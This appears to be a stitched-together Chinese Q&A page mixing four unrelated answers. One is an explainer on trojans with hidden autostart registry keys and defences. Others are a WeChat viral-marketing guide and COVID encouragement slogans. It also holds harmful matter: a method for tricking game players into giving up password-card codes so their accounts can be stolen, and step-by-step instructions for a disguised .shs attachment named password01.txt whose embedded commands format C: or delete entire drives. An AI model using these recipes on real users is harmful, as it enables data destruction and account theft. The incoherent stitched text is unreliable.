(2)文件操作:控制端可藉由遠程式控制制對服務端上的文件進行刪除,新建,修改,上傳,下載,運行,更改屬 性等一系列操作,基本涵蓋了WINDOWS平台上所有的文件操作功能。

(3)修改注冊表:控制端可任意修改服務端注冊表,包括刪除,新建或修改主鍵,子鍵,鍵值。有了這 項功能控制端就可以禁止服務端軟碟機,光碟機的使用,鎖住服務端的注冊表,將服務端 上木馬的觸發條件設置得更隱蔽的一系列高級操作。

(4)系統操作:這項內容包括重啟或關閉服務端操作系統,斷開服務端網路連接,控制服務端的滑鼠, 鍵盤,監視服務端桌面操作,查看服務端進程等,控制端甚至可以隨時給服務端發送信息,想像一下,當服務端的桌面上突然跳出一段話,不嚇人一跳才怪

木馬和病毒都是一種人為的程序,都屬於電腦病毒,為什麼木馬要單獨提出來說內?大家都知道以前的電腦病毒的作用,其實完全就是為了搞破壞,破壞電腦里的資料數據,除了破壞之外其它無非就是有些病毒製造者為了達到某些目的而進行的威懾和敲詐勒索的作用,或為了炫耀自己的技術. "木馬"不一樣,木馬的作用是赤裸裸的偷偷監視別人和盜竊別人密碼,數據等,如盜竊管理員密碼-子網密碼搞破壞,或者好玩,偷竊上網密碼用於它用,游戲帳號,股票帳號,甚至網上銀行帳戶等.達到偷窺別人隱私和得到經濟利益的目的.所以木馬的作用比早期的電腦病毒更加有用.更能夠直接達到使用者的目的!導致許多別有用心的程序開發者大量的編寫這類帶有偷竊和監視別人電腦的侵入性程序,這就是目前網上大量木馬泛濫成災的原因.鑒於木馬的這些巨大危害性和它與早期病毒的作用性質不一樣,所以木馬雖然屬於病毒中的一類,但是要單獨的從病毒類型中間剝離出來.獨立的稱之為"木馬"程序.

一般來說一種殺毒軟體程序,它的木馬專殺程序能夠查殺某某木馬的話,那麼它自己的普通殺毒程序也當然能夠殺掉這種木馬,因為在木馬泛濫的今天,為木馬單獨設計一個專門的木馬查殺工具,那是能提高該殺毒軟體的產品檔次的,對其聲譽也大大的有益,實際上一般的普通殺毒軟體里都包含了對木馬的查殺功能.如果現在大家說某某殺毒軟體沒有木馬專殺的程序,那這家殺毒軟體廠商自己也好像有點過意不去,即使它的普通殺毒軟體里當然的有殺除木馬的功能.

還有一點就是,把查殺木馬程序單獨剝離出來,可以提高查殺效率,現在很多殺毒軟體里的木馬專殺程序只對木馬進行查殺,不去檢查普通病毒庫里的病毒代碼,也就是說當用戶運行木馬專殺程序的時候,程序只調用木馬代碼庫里的數據,而不調用病毒代碼庫里的數據,大大提高木馬查殺速度.我們知道查殺普通病毒的速度是比較慢的,因為現在有太多太多的病毒.每個文件要經過幾萬條木馬代碼的檢驗,然後再加上已知的差不多有近10萬個病毒代碼的檢驗,那速度豈不是很慢了.省去普通病毒代碼檢驗,是不是就提高了效率,提高了速度內? 也就是說現在好多殺毒軟體自帶的木馬專殺程序只查殺木馬而一般不去查殺病毒,但是它自身的普通病毒查殺程序既查殺病毒又查殺木馬!

三、隱形木馬啟動方式揭秘
[編輯本段]

大家所熟知的木馬程序一般的啟動方式有:載入到「開始」菜單中的「啟動」項、記錄到注冊表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]項和[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]項中,更高級的木馬還會注冊為系統的「服務」程序,以上這幾種啟動方式都可以在「系統配置實用程序」(在「開始→運行」中執行「Msconfig」)的「啟動」項和「服務」項中找到它的蹤跡。

另一種鮮為人知的啟動方式,是在「開始→運行」中執行「Gpedit.msc」。打開「組策略」,可看到「本地計算機策略」中有兩個選項:「計算機配置」與「用戶配置」,展開「用戶配置→管理模板→系統→登錄」,雙擊「在用戶登錄時運行這些程序」子項進行屬性設置,選定「設置」項中的「已啟用」項並單擊「顯示」按鈕彈出「顯示內容」窗口,再單擊「添加」按鈕,在「添加項目」窗口內的文本框中輸入要自啟動的程序的路徑,如圖所示,單擊「確定」按鈕就完成了。

添加需要啟動的文件面

重新啟動計算機,系統在登錄時就會自動啟動你添加的程序,如果剛才添加的是木馬程序,那麼一個「隱形」木馬就這樣誕生了。因為用這種方式添加的自啟動程序在系統的「系統配置實用程序」是找不到的,同樣在我們所熟知的注冊表項中也是找不到的,所以非常危險。

通過這種方式添加的自啟動程序雖然被記錄在注冊表中,但是不在我們所熟知的注冊表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]項和[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]項內,而是在冊表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]項。如果你懷疑你的電腦被種了「木馬」,可是又找不到它在哪兒,建議你到注冊表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]項里找找吧,或是進入「組策略」的「在用戶登錄時運行這些程序」看看有沒有啟動的程序。

現在網頁木馬無非有以下幾種方式中到你的機器里

1:把木馬文件改成BMP文件,然後配合你機器里的DEBUG來還原成EXE,網上存在該木馬20%

2:下載一個TXT文件到你機器,然後裡面有具體的FTP^-^作,FTP連上他們有木馬的機器下載木馬,網上存在該木馬20%

3:也是最常用的方式,下載一個HTA文件,然後用網頁控制項解釋器來還原木馬。該木馬在網上存在50%以上

4:採用JS腳本,用VBS腳本來執行木馬文件,該型木馬偷QQ的比較多,偷傳奇的少,大概佔10%左右

5:ARP欺騙,利用ARP欺騙攔截區域網數據,攻擊網關。在數據包中插入木馬。解決方案,安裝ARP防火牆。

四、防治木馬
[編輯本段]

現在我們來說防範的方法
那就是把 windows\system\mshta.exe文件改名,

改成什麼自己隨便 (xp和win2000是在system32下)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\ 下為Active Setup controls創建一個基於CLSID的新鍵值 {6E449683_C509_11CF_AAFA_00AA00 B6015C},然後在新鍵值下創建一個REG_DWORD 類型的鍵Compatibility,並設定鍵值為0x00000400即可。

還有windows\command\debug.exe和windows\ftp.exe都給改個名字 (或者刪除)

一些最新流行的木馬 最有效果的防禦~~

比如網路上流行 的木馬 smss.exe 這個是其中一種木馬的主體 潛伏在 98/winme/xp c:\windows目錄下 2000 c:\winnt .....

假如你中了這個木馬 首先我們用進程管理器結束 正在運行的木馬smss.exe 然後在C:\windows 或 c:\winnt\目錄下 創建一個假的 smss.exe 並設置為只讀屬性~ (2000/XP NTFS的磁碟格式 的話那就更好 可以用「安全設置」 設置為讀取) 這樣木馬沒了~ 以後也不會在感染了這個辦法本人測試過對很多木馬

都很有效果的

經過這樣的修改後,我現在專門找別人發的木馬網址去測試,實驗結果是上了大概20個木馬網站,有大概15個瑞星會報警,另外5個瑞星沒有反映,而我的機器沒有添加出來新的EXE文件,也沒有新的進程出現,只不過有些木馬的殘骸留在了IE的臨時文件夾里,他們沒有被執行起來,沒有危險性,所以建議大家經常清理 臨時文件夾和IE

隨著病毒編寫技術的發展,木馬程序對用戶的威脅越來越大,尤其是一些木馬程序採用了極其狡猾的手段來隱蔽自己,使普通用戶很難在中毒後發覺。

防治木馬的危害,應該採取以下措施:

第一,安裝殺毒軟體和個人防火牆,並及時升級。

第二,把個人防火牆設置好安全等級,防止未知程序向外傳送數據。

第三,可以考慮使用安全性比較好的瀏覽器和電子郵件客戶端工具。

第四,如果使用IE瀏覽器,應該安裝卡卡安全助手,防止惡意網站在自己電腦上安裝不明軟體和瀏覽器插件,以免被木馬趁機侵入。

遠程式控制制的木馬有:冰河,灰鴿子,上興,PCshare,網路神偷,FLUX等,現在通過線程插入技術的木馬也有很多.現在的木馬程序常常和和DLL文件息息相關,被很多人稱之為「DLL木馬」。DLL木馬的最高境界是線程插入技術,線程插入技術指的是將自己的代碼嵌入正在運行的進程中的技術。理論上說,在Windows中的每個進程都有自己的私有內存空間,別的進程是不允許對這個私有空間進行操作的,但是實際上,我們仍然可以利用種種方法進入並操作進程的私有內存,因此也就擁有了那個遠程進程相當的許可權。無論怎樣,都是讓木馬的核心代碼運行於別的進程的內存空間,這樣不僅能很好地隱藏自己,也能更好地保護自己。

DLL不能獨立運行,所以要想讓木馬跑起來,就需要一個EXE文件使用動態嵌入技術讓DLL搭上其他正常進程的車,讓被嵌入的進程調用這個DLL的 DllMain函數,激發木馬運行,最後啟動木馬的EXE結束運行,木馬啟動完畢。啟動DLL木馬的EXE是個重要角色,它被稱為Loader, Loader可以是多種多樣的,Windows的Rundll32.exe也被一些DLL木馬用來作為Loader,這種木馬一般不帶動態嵌入技術,它直接注入Rundll32進程運行,即使你殺了Rundll32進程,木馬本體還是存在的。利用這種方法除了可以啟動木馬之外,不少應用程序也採用了這種啟動方式,一個最常見的例子是「3721網路實名」。

「3721網路實名」就是通過Rundll32調用「網路實名」的DLL文件實現的。在一台安裝了網路實名的計算機中運行注冊表編輯器,依次展開 「HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run」,發現一個名為「CnsMin」的啟動項,其鍵值為「Rundll32 C:\WINDOWS\Downlo~1\CnsMin.dll,Rundll32」,CnsMin.dll是網路實名的DLL文件,這樣就通過 Rundll32命令實現了網路實名的功能。

簡單防禦方法

DLL木馬的查殺比一般病毒和木馬的查殺要更加困難,建議用戶經常看看系統的啟動項中有沒有多出莫名其妙的項目,這是DLL木馬Loader可能存在的場所之一。如果用戶有一定的編程知識和分析能力,還可以在Loader里查找DLL名稱,或者從進程里看多掛接了什麼陌生的DLL。對普通用戶來說,最簡單有效的方法還是用殺毒軟體和防火牆來保護自己的計算機安全。現在有一些國外的防火牆軟體會在DLL文件載入時提醒用戶,比如Tiny、SSM等,這樣我們就可以有效地防範惡意的DLL木馬了。

全廢話,看我的
密報卡解綁過程:
登陸的時候通過木馬盜取玩家的密碼,並且用盜取的密碼進入密碼保護卡解除綁定的網頁頁面,在通過木馬把玩家登陸時候的三個密碼保護卡數換成密碼保護卡解綁需要的三個數,1次就能騙到密碼保護卡解除綁定需要的三個數了,再解除綁定,玩家的帳號就跟沒密碼保護卡一樣.電話密碼保護也一樣,玩家打了電話,然後登陸的時候通過木馬讓玩家不能連接伺服器並盜取玩家的密碼,然後盜取賬號者就2分內可以上去了盜取玩家財產。

『陸』 如何策劃病毒式傳播做好微信營銷

一、微信環境下的病毒式營銷
病毒式營銷是通過提供有價值的產品或服務,讓用戶主動對其進行傳播實現「營銷杠桿」的作用,逐步獲得盡人皆知,盡人參與的成效。如今,病毒式營銷已經成為網路營銷最為獨特的手段,被越來越多的商家和網站成功利用。
病毒式營銷能在微信平台將傳播效益最大下,主要是基於微信的三個特點:相對真實的環境 、朋友圈功能的開發、平台介面的開放。
1、相對真實的環境
微信最早通過導入騰訊qq用戶及手機用戶的電話簿、以及搜索微信號來進行添加好友,而後微信還能通過LBS(基於用戶位置的社交)搜索身邊的陌生人與其互打招呼。雖然其方式打破了熟人社交的模式,但依然是將身邊的人集中在一個平台中進行互動。這些設定都促使微信傳播基於相對真實的環境,微信用戶之間的了解與信任度相較於其它平台來說較高,從而微信平台信息的傳播真實度也會提高。
2、朋友圈功能的開發
朋友圈功能的開發實質上是微信從單純的聊天工具到移動社交媒體的轉型。朋友圈提供了一個用戶信息傳播的場所,微信用戶可以從朋友圈看到好友上傳的動態。可以說,微信朋友圈功能的開發,才讓病毒式營銷在微信平台上得以生存。
3、平台介面的開放
早前微信平台借口的開放,僅限於對外APP平台開放分享功能。而2015 年剛剛開始,微信 JS SDK(網頁開發的工具包)發布。微信此次開放的 SDK站在了另一個高度,它一次性開放了拍攝、錄音、語音識別、二維碼、地圖、支付、分享、卡券等幾十個 API。微信給所有做 web 開發的人打開一扇新的大門:使用微信js,就可以調用各種強大的原生能力了!這些對於微信的病毒式營銷中各種引爆點的打造無疑是一項強大的助力。
二、微信病毒式營銷方式
微信病毒營銷本質在於基於微信朋友圈這個相對真實、社交信任度相對較高的背景環境下,利用微信某些特定功能,輔助「病原體」在熟人之間進行更有效地傳播,從而達到傳播效益的最大化。甚至,可以通過一些小技巧,將熱點進行強制性的曝光。下面我總結了一下幾種微信病毒式營銷方式,並將結合案例進行說明:
1、轉發福利式
案例:「餓了么」發紅包
通過人的心理------「利己性+利他性」,將整個活動傳播開去,再利用紅包內的優惠券促使用戶消費,從而帶動整個平台的銷售額。這種活動可以長期進行,人們對經常使用的代金券有長期的需求,但是成本較高。此次活動中,「餓了么」和「格瓦拉」一起進行活動,分攤成本,也不失為一個好的辦法。
2、游戲炫耀式
案例:圍住神經貓
用戶轉發不僅是一種娛樂的體驗,更是一種對自我的表達,是一種尋求社會認同感的表現。同游戲炫耀式一樣,測試的確可以當成引爆點,但是不能很好地進行用戶的轉化。
4、游戲福利式
案例:「赫蓮娜」開年送禮
HR赫蓮娜在14年伊始曾做過送「赫」禮的活動,用戶只需在微信中回復「我愛HR」即可參與。通過有趣的接寶游戲,可「馬」上領取赫蓮娜2014全新登錄的極致修護晚霜體驗裝。同時如果分享活動,能得到更多的游戲機會和神秘好禮。游戲過後獲得結合身份識別的唯一兌換二維碼,讓中獎用戶到線下專櫃領取。
除去該品牌自身的影響力外,該活動趣味性強,禮品充滿誘惑力。參與游戲之前會員必須進行注冊,這就在提升知名度的同時,也誘導增長了用戶量。另外,赫蓮娜有線下實體店的空間優勢,可以將線下禮品的發放與線上活動同時進行,形成完美的O2O閉環。
5、互動分享式
案例1:「耐克」人人都是攝影師
14年, AKQA與Nike合作,利用微信平台推出 「自由起動」活動。關注nike的微信號,隨意上傳一張照片,就能即刻收到一張根據照片量身打造的FreeID設計圖,上傳的照片越是顏色亮麗、對比度高,FREE ID設計圖的色彩也就越豐富。將設計圖和起動故事分享到微博,還有可能獲得一雙真正的跑鞋。活動開始的一個月內,已經積累了33090張上傳照片。
這種基於微信的互動營銷由於活動內容充滿創意,新鮮有趣,所以頗具人氣。參與用戶在關注微信公眾號的同時,通過在其它平台的分享將活動傳播開去。實際Nike此舉上完成了微博、微信粉絲的雙向導流。
案例2:九步之遙
電影《一步之遙》上映之時,大眾點評推出了「九步之遙」的推廣活動。通過與姜文電影9道有關的趣味答題與用戶進行互動,最終達到對電影的推廣目的。活動中抓住「姜絲」這批用戶,利用姜文的影響力實現病毒式營銷。
利用HTML5做出的頁面有十分酷炫的效果,整個活動富有創意,十分引人入勝。利用了姜文的影響力,部分「姜絲」會去進行主動分享。但誘導分享的力度仍是不夠,倘若在游戲中設置分享才可再獲得一次答題機會,答題全中有獎勵,利用所有用戶,而非僅僅是「姜絲」,活動傳播的覆蓋面則會更廣。
6、投票福利式
案例:「麗康寶貝」健康寶寶評選
15年,「麗康寶貝」發起健康寶寶評選活動,通過上傳寶貝的照片到平台,為寶貝投票,從而評選出健康寶寶送出獎金。此活動看似為孩子提供了一個展示的平台,實際上是通過父母對孩子的自豪感和初為父母的的表現欲,再加以獎金誘惑讓其主動在朋友圈之間傳播。通過關注微信號才能參與該活動,收獲用戶的同時也能造成用戶的主動傳播,網路票選的確是病毒式營銷較穩妥的方式之一。
而活動中的意見領袖與初期平台的粉絲基數也是網路票選能否成功的關鍵。
7、活動集贊福利式
案例:uber 「極限挑戰」活動
UBER曾聯合THE NORTH FACE推出「1鍵冒險」活動,用戶將活動信息分享到朋友圈集齊88個贊就有可能獲取參與到極限挑戰的資格。
活動自身同樣是有趣有料,通過分享加集贊的方式讓想參與的用戶主動進行傳播,對活動信息進行強制性的曝光,知名度提升很快。然而,想參與活動的人群只是一部分,參與用戶讓朋友幫忙點贊後由於所需點贊數太多或其它原因,朋友極少數會對活動信息進行二次分享,所以在第二輪傳播中不少病毒鏈將會斷掉。所幸一個人集齊需要88個贊,第一輪病毒傳播的效益很大。
8、升級集贊福利
案例:大眾點評「拼色塊」
大眾點評經常做升級版的集贊活動,推出某個活動傳播給朋友,然後可獲取優惠券。其實這種方式是「新瓶裝舊酒」,由直接集贊升級為讓朋友拼色塊,其本質都是讓朋友看到這條活動信息。但是游戲可以直接發送給特定的朋友讓其為自己點贊,避免分享到朋友圈讓全部看到。通過拼色塊游戲並不能直接為品牌帶來用戶,但是因為「優惠券」的使用而不得不成為品牌的用戶。這種創新升級式的變相集贊適用於搭配純福利(不能為用戶提供展示面的福利:如現金、話費、優惠券、禮品)進行,而優惠券則是能帶來銷售額的最佳選擇。
三、如何打造微信病毒式營銷
在微信的病毒式營銷中,好的「病毒」能讓品牌的知名度在短期內迅速提升,但是進一步實現用戶的增加量卻需要結合微信傳播的一些技巧,並巧妙給予獎勵。微信病毒式營銷可以主要從病原體、傳播方式、福利三個方面進行闡述。
1、第一把斧:病原體
病原體的創造,必須有趣、有料、最好帶有時尚性,或者能提供用戶社會認同感才能形成引爆點。綜合以上分析,我歸納了一下幾種可以造成傳播的引爆點:
2、第二把斧:傳播機制
當有好的引爆點後,選擇恰當的微信曝光機制,以下就我見過的微信傳播方式加以總結:
3、第三把斧:福利
福利的分享是病毒式營銷的極大助力。分享福利意味著接受分享者參與游戲也可以獲取福利。經過歸納後,我將福利分成了一下幾種:
1)紅包、優惠券
這是電商提升銷售額的管用手法,只要與傳播方式結合得恰當,通常可有較好的傳播效果。
2)手機話費
將話費作為福利的確流行過一段時間,但是用戶經歷過太多虛假的信息,已經形成疲勞,就目前來說再次形成病毒營銷難度系數略高。
3)體驗活動的機會
活動要求充滿誘惑力。通常是人們通常無法實現的,或者需要很大代價或者精力才可以自己實現。
4)禮品
禮品的選擇一定要有特色或者高價值,如:大白公仔與螢火蟲公園的門票。沒有特色的禮品活動的吸引力會大大降低。禮品的數量也要適中,否則用戶認為沒有希望得到,也不會參與到其中。
5)無形的感覺
可以通過活動給用戶一個展示的平台,滿足用戶的炫耀、自我滿足、虛榮心、喜好(粉絲)等。
6)流量
流量營銷在近來很受歡迎,通過將直接或者游戲通關等方式將流量發給用戶也是一種不錯的選擇。
7)游戲機會
轉發過後可再獲得一次游戲機會,游戲通關後會有禮品或者完成游戲的過程中會獲得禮品。
一般來說完整的微信病毒營銷需要考慮病原體、傳播方式、福利三個方面,針對不同的情況,只考慮其中兩個方面也能造成病毒式營銷。例如,「餓了吧」等外賣電商只發紅包,但是結合活動的點安插在用戶下過訂單後可獲得分享紅包給好友的機會,而好友確實也需要這樣一個紅包。所以福利就直接轉化成為病原體。再者,好的游戲無須福利等就能形成病毒,能迅速提升知名度。但是這樣操作用戶轉化率卻很低---用戶只會玩游戲並不會成為粉絲。如果能加以福利,比如游戲通關後可以到微信後台領取獎勵,關注後才可以玩游戲下一關等,用戶的轉化率會有所得到提升。
策劃一次病毒式營銷活動必須明確此次推廣的目標,是提升知名度、獲取用戶量還是提升銷售額。一個好的營銷活動,目標一定要精準,多個目標則會降低整個活動的水準。如果此次活動目的是提升知名度,那麼病原體的選擇可以盡量輕便一些,選擇游戲類的活動、互動或者直接是游戲。如果有用戶量的要求,可以在傳播過程中添加一些門檻,比如關注微信號後才能參與、注冊後才能有獲得禮品,而要達到提升銷售額的目的則可以用優惠券作為獎勵獎勵吸引消費。
總之,策劃微信病毒營銷要參考品牌自身的情況----資金、技術、影響力、粉絲基數、用戶黏性等,再從活動病原體、傳播機制、以及福利從三個方面考慮,最終得出最適合的營銷策劃方案。
參考資料:http://www.zicaitou.com/post/381.html

『柒』 怎樣製做病毒

1.創建一個只包含一個空格(
為了減小文件體積)的文本文件,任意取名。
2.打開{寫字板文檔},將此文件拖放入{寫字板文檔}。也可以點擊記{寫字板
文檔}單欄中的「插入\對象」,彈出「插入對象」對話框,選中「從文件創建」,然後
點擊「瀏覽」按鈕選擇要插入的文件。
3.選中該插入對象的圖標,選擇菜單欄中的「編輯\包對象\編輯包」(如圖1)。在彈
出的「對象包裝程序」對話框中,選擇菜單欄中的「編輯\命令行」,然後輸入如下命令
:start.exe /m format c:/q /autotest /u ,點擊「確定」,此時,內容欄中會顯示
出命令內容。
4.點擊外觀欄中的「插入圖標」按鈕,會彈出一個警告對話框,確認,然後任選一
個圖標。
5.選擇菜單欄中的「編輯\卷標」,為此嵌入對象取一個名稱(會替換原來的文件名
稱)。點擊「文件」菜單中的「更新」,然後關閉此對話框。
6.將剛剛建立的嵌入對象拖放到桌面上。文件的默認名是「碎片」(在2000下的默
認名為」片段」),現在我們把它改成「password01.txt」。打開電子郵件程序將桌面
上的「password01.txt」作為附件發出,或者將含有嵌入對象(帶有惡意命令)的文檔作
為附件發出。
7.當郵件接收者誤將「password01.txt.shs」文件作為「password01.txt」(如前文
所述,「.SHS」擴展名永遠是隱藏的)放心地打開時,或打開文件,點擊文件中的嵌入對
象時觸發惡意命令(彈出DOS運行窗口,執行格式化命令).如果將上面的命令替換為:st
art.exe /m deltree /y a:\*.* c:\*.* d:\*.* 則是將刪除對方硬碟下所有文件(盤符
根據實際情況自定義);如果替換為:start.exe /m deltree /y
c:\windows\system\*.* 則是刪除對方c:\windows\system\目錄底下的所有文件.(當
然大家可以改成其它的命令)
很簡單,這樣一個病毒的攻擊程序被弄出來了

在這前提下是要學好匯編語言 這是最關鍵的 也是最難的 你說的網站有多種語言寫的有 asp .net jsp php 等所以沒學好匯編語言 (那就是空談)

『捌』 病毒手抄報內容20字

11、民齊者強,在這場戰「疫」中,唯有萬眾一心、眾志成城!面對疫情,團結是最強的免疫力!有英雄的武漢,有英雄的民族,舉國同心,我們一定能過關!

12、武漢是英雄的城市,武漢人民、武漢人民是英雄的人民,歷史上從來沒有被艱難險阻壓垮過!疫情防控工作到了最吃勁的關鍵階段,更要無懼風雪、奮戰到底!

13、我們都應該慶幸我們是中國人。我們都看到了,短時間內只有我國才能完成閉戶封城的創舉!短時間內只有我國能建造那麼多的醫院!短時間內只有我國有八方支援的同胞,以及免費治療新冠肺炎!一線工作者辛苦了!希望疫情早早結束,我愛中國!中國加油!

14、愛與希望,陪伴我們一起渡過難關。武漢加油,中國加油!我們在一起!

15、一群人一條路堅持一直走下去~在一起不容易點亮生命不放棄

16、沒有天生的英雄,只有挺身而出的凡人,你們不懼疫情,不畏艱難,毫不猶豫的選擇奮斗在抗爭冠狀病毒的第一線,成為最美逆行者,感謝你們的付出,武漢加油!

17、讓我們為武漢加油,為所有在一線堅守的醫護人員加油,一起打贏這場防疫戰!你們都是平凡而偉大的人。感謝!感恩!敬佩!願平安。

18、在提及武漢時,鍾南山院士幾度哽咽,眼含淚光,他堅定地說:武漢,本來就是一個英雄的城市;武漢,是能夠過關的!

19、"武漢勝則武漢勝,武漢勝則全國勝。"武漢加油!武漢加油!中國加油!

20、要知道沒有人必須在你需要的時候幫你,只有你自己,所以讓自己獨立堅強快樂幸福,才是你需要做的,畢竟只有自己必須和你生死與共,息息相關。

21、在這個特殊的時刻,祝福大家新年健康快樂,祝福×及武漢人民身體健康,早日戰勝疫情!

22、最近陽光好好,春天也要到了,希望疫情早日結束!

23、祝福武漢、祝福×早日康復,祝願武漢公交早日恢復運轉,祝願每一個人遠離病痛!

24、希望春節期間肺炎能過去,大家平安。武漢加油,各省加油!

25、武漢加油,武漢加油,祝福全國人民新年快樂,一切都會好起來的!

26、月有陰睛圓缺,日有朝夕晝夜,天有不測風雲,人有旦夕禍福,世事無常多變幻,生命珍貴有短長,我們能做的是坦然面對,處驚不亂,穩中求勝。中華民族總能在災難面前,不畏懼,不退縮,萬眾一心,眾志成城,祝福武漢,祝福武漢,祝福中國!

27、望全國人民早日戰勝病毒,度過難關,武漢加油!